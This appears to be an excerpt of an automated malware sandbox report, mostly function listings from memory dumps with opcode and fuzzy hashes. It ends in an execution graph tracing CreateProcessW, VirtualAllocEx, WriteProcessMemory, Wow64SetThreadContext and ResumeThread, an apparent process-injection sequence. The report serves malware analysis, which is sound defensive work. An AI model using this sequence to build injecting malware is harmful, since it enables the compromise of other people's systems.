                                • Snapshot File: hcaresult_15_2_c10000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 149418ef386aeedae6212b4ce897742cf44b610dccf9762bad066356faed3617
                                • Instruction ID: 2b5f01700d1bf3178b1abdc93e6ee66d631965729edac513a17ae9f03787ae54
                                • Opcode Fuzzy Hash: 149418ef386aeedae6212b4ce897742cf44b610dccf9762bad066356faed3617
                                • Instruction Fuzzy Hash: FC919D347042058FDB05EB34E868A6E7BF2BF89601B50466DE446CB3B5EF709D058B91
                                Function 00C11157 Relevance: .1, Instructions: 92COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000F.00000002.1734684059.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_c10000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2daf6990999464365f6370771a34e3f7e2e83eb1a11b6c205a3aac8714dee2c7
                                • Instruction ID: 521cb5c4dc9b64bde5032d0a6f5e8d7bcc7ec1cb4127ddbfce839ea4997af507
                                • Opcode Fuzzy Hash: 2daf6990999464365f6370771a34e3f7e2e83eb1a11b6c205a3aac8714dee2c7
                                • Instruction Fuzzy Hash: FF31C4313007048BDB68BB79982467E76E2BFC86053948A2ED417CB790DF759E049FD1
                                Function 00C11740 Relevance: .1, Instructions: 76COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000F.00000002.1734684059.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_c10000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2c5896df2d4ed30ad1061c239be3e0a464b22abfdf053be2c3a824e39dad50a4
                                • Instruction ID: 13efd0fa4b87a4ef916c7d3568fe9fecdf742f727d2f23df3d343282eae9db22
                                • Opcode Fuzzy Hash: 2c5896df2d4ed30ad1061c239be3e0a464b22abfdf053be2c3a824e39dad50a4
                                • Instruction Fuzzy Hash: 7231BF74905309DFDB45FBB8D891AADBBB2FFC8701F204669D401AB359EB705A40CB51
                                Function 00C11860 Relevance: .1, Instructions: 75COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000F.00000002.1734684059.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_c10000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 51a31d56bdc0376f51500a5bd35486ba8bf2fd886e14085e9cccf4aedc8745ea
                                • Instruction ID: 30674061f4dabdeaad2532815549bfbd5eeb6179650fa5fc8678f7d42e320e00
                                • Opcode Fuzzy Hash: 51a31d56bdc0376f51500a5bd35486ba8bf2fd886e14085e9cccf4aedc8745ea
                                • Instruction Fuzzy Hash: 4C21C071B002049FDB44BBBE881836EBAEAEFCD700B64842ED54BD7391DE749D0157A1
                                Function 00C11750 Relevance: .1, Instructions: 70COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000F.00000002.1734684059.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_c10000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4f9199231d768e2d0c32139390d58d968a85a0b2933d6b8bda04b0a6c4b56f78
                                • Instruction ID: 26598098ee3bd7ea464e191ae8546ce2b710d970bd3a49fab1515d214f2c2c49
                                • Opcode Fuzzy Hash: 4f9199231d768e2d0c32139390d58d968a85a0b2933d6b8bda04b0a6c4b56f78
                                • Instruction Fuzzy Hash: 08219F34901309DFDB44FBB8D895AADBBB6FFC8700F104669D401AB358EB706A40CB91
                                Function 00C10939 Relevance: .1, Instructions: 66COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000F.00000002.1734684059.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_c10000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 196ef6fa62c128d1da6943cfbd8f6d868aef421c16d8095a651d0d42f967b326
                                • Instruction ID: 5e845bc89335ec77ac41943d444b1f2bef4e619fc5e9f6a5b58c7b72909921a8
                                • Opcode Fuzzy Hash: 196ef6fa62c128d1da6943cfbd8f6d868aef421c16d8095a651d0d42f967b326
                                • Instruction Fuzzy Hash: 6C21D430B05248CFCB45EBB889547AD7BF1EF85300F6480AED449EB291EB709E48D791
                                Function 00C10848 Relevance: .0, Instructions: 47COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000F.00000002.1734684059.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_c10000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9c7e75bdb988859f802be5d8fb73108d5f811b613315a4bfae1f94c86101e497
                                • Instruction ID: 7b8a10c0a01ce3aed7b692a6cd03afc3ead06e1395d1aaebc88fc1b1490279a8
                                • Opcode Fuzzy Hash: 9c7e75bdb988859f802be5d8fb73108d5f811b613315a4bfae1f94c86101e497
                                • Instruction Fuzzy Hash: 0111CB3451A35A8FDB06FF28F9E0E453BA5F7C4A05B009A6DD4488F26DDB706E098F81

                                Executed Functions

                                Function 02740D95 Relevance: .5, Instructions: 470COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000010.00000002.1735186250.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_2740000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 80e2603816266341e5c770ec1d6bafbbb8dfe78f272b3276658bfc78dd1c222f
                                • Instruction ID: 4a66bbfba82a45ded07dfc18827608f6e85f7415774e83ebd6ff6dff575969ca
                                • Opcode Fuzzy Hash: 80e2603816266341e5c770ec1d6bafbbb8dfe78f272b3276658bfc78dd1c222f
                                • Instruction Fuzzy Hash: 42515E35A003058FCB0BBB75E4A856E7BB6BFC86017005A69D40A9B269EF309D85CB81
                                Function 02741010 Relevance: .2, Instructions: 249COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000010.00000002.1735186250.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_2740000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a648575117c0795164d2a30396a314eb7d5f654f7492c3cf6b2287aa6f3749e7
                                • Instruction ID: 07545e69047f3287b18495468c90f73c8a4f5b761c57a02a2474c92616e2f2c5
                                • Opcode Fuzzy Hash: a648575117c0795164d2a30396a314eb7d5f654f7492c3cf6b2287aa6f3749e7
                                • Instruction Fuzzy Hash: F0918331B003058FDB0AEB75E898A2E7BF6BFC8601B105969D406DB3A5DF309D45CB81
                                Function 02741157 Relevance: .1, Instructions: 92COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000010.00000002.1735186250.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_2740000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f9f743a3e462326ef58e9414951714c01c82a1870344f01369d543cfa3f44c21
                                • Instruction ID: 08c04d8e49c7972b891da29be17327f6d1859caaa3604176ae9cc3eb2ad003a6
                                • Opcode Fuzzy Hash: f9f743a3e462326ef58e9414951714c01c82a1870344f01369d543cfa3f44c21
                                • Instruction Fuzzy Hash: 3B318B32700B048BDB5ABB79942426FB6E2BFC46153548E2EC41BCB780EF319E449B91
                                Function 02741860 Relevance: .1, Instructions: 75COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000010.00000002.1735186250.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_2740000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bb515eb773d5260326b9c3e4dd9827bf4ca6d42405fdb2793483ccc236a4674d
                                • Instruction ID: 446cbfee35220ee2077c6232a092678970a561672661baefc49e801886434b28
                                • Opcode Fuzzy Hash: bb515eb773d5260326b9c3e4dd9827bf4ca6d42405fdb2793483ccc236a4674d
                                • Instruction Fuzzy Hash: A5219371B012059BDB18ABB9885836FFAEAEFC9641B24842ED54BD7381DE348C0157A1
                                Function 02741743 Relevance: .1, Instructions: 73COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000010.00000002.1735186250.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_2740000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b02af2fcdf6fa0edf08d51193b25f2dc8933ca8cac8951d30dbdc29493dc830c
                                • Instruction ID: 778ee26f1326c40649c933cd49bd672621f93dd4dc623b23b70ca6f3eb20c3dc
                                • Opcode Fuzzy Hash: b02af2fcdf6fa0edf08d51193b25f2dc8933ca8cac8951d30dbdc29493dc830c
                                • Instruction Fuzzy Hash: BE317A34A04309DFDB45FBB8D8956ADBBB2FF88600F204A69D401AB348EB306A45CB51
                                Function 02741750 Relevance: .1, Instructions: 70COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000010.00000002.1735186250.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_2740000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 67b67b4e35dae2b2355f318dda8d457db0a01bd180952e8a9198aba0ebd378c1
                                • Instruction ID: 4f9671d58f8cac23d469e2de2200a662d6e4fab5f82981dc5c3f3c9e75a35519
                                • Opcode Fuzzy Hash: 67b67b4e35dae2b2355f318dda8d457db0a01bd180952e8a9198aba0ebd378c1
                                • Instruction Fuzzy Hash: 1F216D74A00309DFDB45FBB8D8856ADBBB2FFC8701F104A69D406AB348EB305A41CB51
                                Function 02740939 Relevance: .1, Instructions: 64COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000010.00000002.1735186250.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_2740000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 04336d66980d4acb75d1dc2d911747780f9cc540742818b90470e56df3c938b7
                                • Instruction ID: bc171ac0a3131ae1450c73426602a8a14664e9cc75e371079d056166d99e00ce
                                • Opcode Fuzzy Hash: 04336d66980d4acb75d1dc2d911747780f9cc540742818b90470e56df3c938b7
                                • Instruction Fuzzy Hash: CC21A130A05208DFCB49EFB8C5453AEBBF5EF85300F1084AAD5099B281DF308E45CB81
                                Function 02740828 Relevance: .1, Instructions: 59COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000010.00000002.1735186250.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_2740000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8d4f739469eda3dd594541ba366b2a793147fb2460fb3c89890a166d6f5f6fa1
                                • Instruction ID: 806455cedcd356aae1b5ba83bdbd7ed5581fe17ba0c5652c8feb2beb41df2a7e
                                • Opcode Fuzzy Hash: 8d4f739469eda3dd594541ba366b2a793147fb2460fb3c89890a166d6f5f6fa1
                                • Instruction Fuzzy Hash: D7211A341193568FDB03FF28F8909457FB6FB81E057009AA5D448AF26ED7706A4ACF81
                                Function 02740848 Relevance: .0, Instructions: 47COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000010.00000002.1735186250.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_2740000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 872eedf2b49284e5ca3021486c12277b4a2754e0a61fe49e6b031657eeeb964a
                                • Instruction ID: 49bb27870999b974bfde6e665ef1139a84a31d062025b875abf73b4ea2bcb081
                                • Opcode Fuzzy Hash: 872eedf2b49284e5ca3021486c12277b4a2754e0a61fe49e6b031657eeeb964a
                                • Instruction Fuzzy Hash: E011CB3451931A8FDB06FF28F8C0A497BB6F784E05B009A64D448AF21DD7706E4ACF81

                                Executed Functions

                                Function 00BC0D95 Relevance: .5, Instructions: 472COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.1735706361.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_bc0000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 61d6a8be3f693fdce1fb3a412c2350f3d3274aea1ad1487d6013eb3f007e2c56
                                • Instruction ID: 35005fefebe485863d5a5ad31e2aefad57794809a1aeb66477c13ad0f7017ee0
                                • Opcode Fuzzy Hash: 61d6a8be3f693fdce1fb3a412c2350f3d3274aea1ad1487d6013eb3f007e2c56
                                • Instruction Fuzzy Hash: 0D5152346007418FDB09FB78E86896E7BF2BB856413008A79D41B8B275EF349D49DF85
                                Function 00BC1010 Relevance: .2, Instructions: 249COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.1735706361.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_bc0000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3c2fdca3a02ba9037713b1fc5b5ebe3875dbd38ecf6bef7829e429ab7dc44325
                                • Instruction ID: d3531eaa3fbff9e449baf1c96b367f3d2bd74eb2cc3472fe3a2ca9bb1ef0dcbb
                                • Opcode Fuzzy Hash: 3c2fdca3a02ba9037713b1fc5b5ebe3875dbd38ecf6bef7829e429ab7dc44325
                                • Instruction Fuzzy Hash: D69181347003058FDB09EB78E868A6E7BF2BF896417108569D40ADB3B5EF349D09DB85
                                Function 00BC1157 Relevance: .1, Instructions: 92COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.1735706361.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_bc0000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a60f29bb1eb76074ee519be8c787f018a21c8fabd3e52e20fa5dc2275f28a14d
                                • Instruction ID: 1df542926a58a7178d7389a86fc2d1b88c407d6322fb35940b4213e78c47ac77
                                • Opcode Fuzzy Hash: a60f29bb1eb76074ee519be8c787f018a21c8fabd3e52e20fa5dc2275f28a14d
                                • Instruction Fuzzy Hash: BA31A131300B008BDB59BB79982862E76E2BFC46553408A6DC41BCB790DF39DE049FD6
                                Function 00BC1740 Relevance: .1, Instructions: 76COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.1735706361.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_bc0000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5d1974137a10e9f7eaa8a9d9c3cc18a73ecf782847f032029623895be295f815
                                • Instruction ID: 5feab3c857dda2fac52fd2219d119661b7f5524057bc04516a120743a3117ac2
                                • Opcode Fuzzy Hash: 5d1974137a10e9f7eaa8a9d9c3cc18a73ecf782847f032029623895be295f815
                                • Instruction Fuzzy Hash: 4B318E74A00309DFDB45EBB8D954AADBBB2FFC8200F104569D406A7365DB306A45DB91
                                Function 00BC1860 Relevance: .1, Instructions: 75COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.1735706361.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_bc0000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a49fd5b59b3996a3194ce2f002d73d71c39e15ef92a48275615315b26613c683
                                • Instruction ID: f4e880ec0de3ee276ec9c863cd7eeff6b25e751d248249a4c9a03547b26f09c8
                                • Opcode Fuzzy Hash: a49fd5b59b3996a3194ce2f002d73d71c39e15ef92a48275615315b26613c683
                                • Instruction Fuzzy Hash: ED21A161B002049BDB48EBB9481836FBAEAEFC9641B10842DD84BD7381DE388C0597A1
                                Function 00BC1750 Relevance: .1, Instructions: 70COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.1735706361.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_bc0000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: aa504bd64ee077f7772034f6762e9065a4a518c8ef7a38a07de66d2c0691d970
                                • Instruction ID: c14a205656d63899b4256b48da270adaa8b840cc0f56a9d3ec0e99c8db56e199
                                • Opcode Fuzzy Hash: aa504bd64ee077f7772034f6762e9065a4a518c8ef7a38a07de66d2c0691d970
                                • Instruction Fuzzy Hash: B1219F74A00309DFDB44FBB8D844AADBBB2FFC8300F104669D406A7364DB305A45DB91
                                Function 00BC0939 Relevance: .1, Instructions: 68COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.1735706361.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_bc0000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: da1982ef8578a5a14884b3f8b3ac52ef449c576be5754fdd2d9dcff2cfdb89a1
                                • Instruction ID: a4abbf1a77c643e8787593f1e80c8a6ad775daa0e6923319c1e183fb402fedbd
                                • Opcode Fuzzy Hash: da1982ef8578a5a14884b3f8b3ac52ef449c576be5754fdd2d9dcff2cfdb89a1
                                • Instruction Fuzzy Hash: 3421D130A04248DFDB58EBB8D855BAE7BF1EF85340F1080ADD44ADB286EB749E44C791
                                Function 00BC0848 Relevance: .0, Instructions: 47COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.1735706361.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_bc0000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2693bf34a217fba9b7b3313f57bf28782c31879f040f33fff2bab99708d8ba8e
                                • Instruction ID: b75284492af252f5a01df3e119f09d59090048c589d590738e4661790cc0d631
                                • Opcode Fuzzy Hash: 2693bf34a217fba9b7b3313f57bf28782c31879f040f33fff2bab99708d8ba8e
                                • Instruction Fuzzy Hash: 1611893461135A9FDB02FF2CF990E497BA5F7D4606B009A54D4048B27DEB70694FAF81

                                Executed Functions

                                Function 02DA0D95 Relevance: .5, Instructions: 471COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000012.00000002.1736881598.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_18_2_2da0000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e7671e22858bbf2f1d2c69299668b51c5f987b05918aab1a0a4853444efcf318
                                • Instruction ID: 567dea278b8a95a836a2da5df37881e5bf45f0bbd9b572c33c255ba19120e7cf
                                • Opcode Fuzzy Hash: e7671e22858bbf2f1d2c69299668b51c5f987b05918aab1a0a4853444efcf318
                                • Instruction Fuzzy Hash: 7F5146756403068FCB95FF74E4A856E7BA2BFC82017418A29D426CB398EF309D09DB91
                                Function 02DA1010 Relevance: .2, Instructions: 249COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000012.00000002.1736881598.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_18_2_2da0000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3c241867cfe057b51d98ba661b1f4d29f7b273c6477616a0c38d7cdb2752b622
                                • Instruction ID: 92ca14d083bdb3cf2cb8fe4319516a4514c50a03154f3a005e59e0f2606bb16d
                                • Opcode Fuzzy Hash: 3c241867cfe057b51d98ba661b1f4d29f7b273c6477616a0c38d7cdb2752b622
                                • Instruction Fuzzy Hash: 6191B2347403068FCB55EB74E8A8A6E7BF2BFC8201B414569D416DF3A9EF309C099B91
                                Function 02DA1157 Relevance: .1, Instructions: 92COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000012.00000002.1736881598.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_18_2_2da0000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a41d37d0e486c60db5b5c8dc241f2c0573e812cd0ba9ea639b084724213e72dc
                                • Instruction ID: 3b77d132dae4757e00070c7adb4aef732e93d3b32e646828b5320bb82cecb81a
                                • Opcode Fuzzy Hash: a41d37d0e486c60db5b5c8dc241f2c0573e812cd0ba9ea639b084724213e72dc
                                • Instruction Fuzzy Hash: CB31A2317007018BDBA9BB79946463E76E2BFC86153908A2DC42BCB780DF35DD08ABD1
                                Function 02DA1860 Relevance: .1, Instructions: 76COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000012.00000002.1736881598.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_18_2_2da0000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 71fc68c6b875763fc479ad131b6a6a5309a9013e60c0d596dcd734143463d3b5
                                • Instruction ID: e66917866e8d59e4879e83ef467b967e14f06e737bd23286597dbd8d6fb09627
                                • Opcode Fuzzy Hash: 71fc68c6b875763fc479ad131b6a6a5309a9013e60c0d596dcd734143463d3b5
                                • Instruction Fuzzy Hash: BD219071B403069BDB54EBBA481836FBAEAFFC8611B64842ED84BD7380DE359C0157A1
                                Function 02DA1750 Relevance: .1, Instructions: 70COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000012.00000002.1736881598.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_18_2_2da0000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fba09519f6c96dd8cdfa6eab99bb0a0ff25e4e185a421d866c8b9c1a76f1ffb3
                                • Instruction ID: a9daad576acb42dbb90c4b71ff1644679f013580aae8cda0f9b37172a907cc50
                                • Opcode Fuzzy Hash: fba09519f6c96dd8cdfa6eab99bb0a0ff25e4e185a421d866c8b9c1a76f1ffb3
                                • Instruction Fuzzy Hash: 3221417490030DDFDB45EFB4D894A9DBBB6FFC8201F104569D405AB354EB316A44CB51
                                Function 02DA0939 Relevance: .1, Instructions: 69COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000012.00000002.1736881598.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_18_2_2da0000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 32308697515aec80ad32a859b1399aeb86ed5ef25dfd7f257abcdea7ee4d957c
                                • Instruction ID: ff3caf8ecf942a1e050c5e6ba4c2ad0c504c80658510b934939f1e2a779fade7
                                • Opcode Fuzzy Hash: 32308697515aec80ad32a859b1399aeb86ed5ef25dfd7f257abcdea7ee4d957c
                                • Instruction Fuzzy Hash: 49218E30E45208DFCB98EBB8D4957AEBBF1FF84210F248469C409AB344EB359D05CB91
                                Function 02DA0848 Relevance: .0, Instructions: 47COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000012.00000002.1736881598.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_18_2_2da0000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: eeec9d477658e986d1075c29ba5b2a88963957989afce8fbb9ebaafff0286a85
                                • Instruction ID: e64f5785253583b0e02b4a78fd90370dd588117aef6724c674598796231703cf
                                • Opcode Fuzzy Hash: eeec9d477658e986d1075c29ba5b2a88963957989afce8fbb9ebaafff0286a85
                                • Instruction Fuzzy Hash: D711CBB414031FAFDB42FF28FCE0A453BA5FB84605B049A65D4148B22DF7706D098F91

                                Execution Graph

                                Execution Coverage:29.6%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:42
                                Total number of Limit Nodes:4
                                execution_graph 3789 c54e40 3790 c54ecd CreateProcessW 3789->3790 3792 c55026 3790->3792 3792->3792 3801 c571d0 3802 c571ea 3801->3802 3803 c57239 3802->3803 3806 c5727c 3802->3806 3810 c57288 3802->3810 3808 c57288 3806->3808 3814 c5614c 3808->3814 3809 c574af 3809->3802 3811 c572bb 3810->3811 3812 c5614c CreateProcessW 3811->3812 3813 c574af 3812->3813 3813->3802 3815 c57ce8 CreateProcessW 3814->3815 3817 c57ece 3815->3817 3818 c520f0 VirtualAllocEx 3819 c521a7 3818->3819 3793 c51ec8 3794 c51f26 3793->3794 3795 c51f3b Wow64SetThreadContext 3793->3795 3794->3795 3796 c51f84 3795->3796 3797 c51ba8 3798 c51c35 CreateProcessW 3797->3798 3800 c51d8e 3798->3800 3820 c55f98 3821 c55fb2 3820->3821 3822 c56001 3821->3822 3824 c56450 3821->3824 3826 c56483 3824->3826 3828 c54024 3826->3828 3827 c56677 3827->3821 3829 c56eb0 CreateProcessW 3828->3829 3831 c57096 3829->3831 3831->3831 3832 c51fd8 ReadProcessMemory 3833 c52097 3832->3833 3834 c521f8 3835 c52276 WriteProcessMemory 3834->3835 3836 c52261 3834->3836 3837 c522d8 3835->3837 3836->3835 3838 c52338 ResumeThread 3839 c523c0 3838->3839

                                Executed Functions

                                Function 00C55C6C Relevance: 1.7, APIs: 1, Instructions: 224processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 672 c55c6c-c55d03 673 c55d05-c55d17 672->673 674 c55d1a-c55d28 672->674 673->674 675 c55d3f-c55d7b 674->675 676 c55d2a-c55d3c 674->676 677 c55d7d-c55d8c 675->677 678 c55d8f-c55e5c CreateProcessW 675->678 676->675 677->678 682 c55e65-c55f24 678->682 683 c55e5e-c55e64 678->683 693 c55f26-c55f4f 682->693 694 c55f5a-c55f65 682->694 683->682 693->694 697 c55f66 694->697 697->697
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00C55E49
                                Memory Dump Source
                                • Source File: 00000013.00000002.1790724142.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_c50000_GeUT.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 7da6d72bb93f8aeb1cdfabe17ab0bc339b3bcaf753abfb8b9a2b79fc67bcb2f6
                                • Instruction ID: d9c637722ed484922c6c2f7673178ab86c986d0df4fc9461118c3cad0985fe38
                                • Opcode Fuzzy Hash: 7da6d72bb93f8aeb1cdfabe17ab0bc339b3bcaf753abfb8b9a2b79fc67bcb2f6
                                • Instruction Fuzzy Hash: DA81C175D0026ADFDF20DFA5C884BDDBBB5AB49300F1091AAE509B7260DB709A89CF54
                                Function 00C54E34 Relevance: 1.7, APIs: 1, Instructions: 224processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
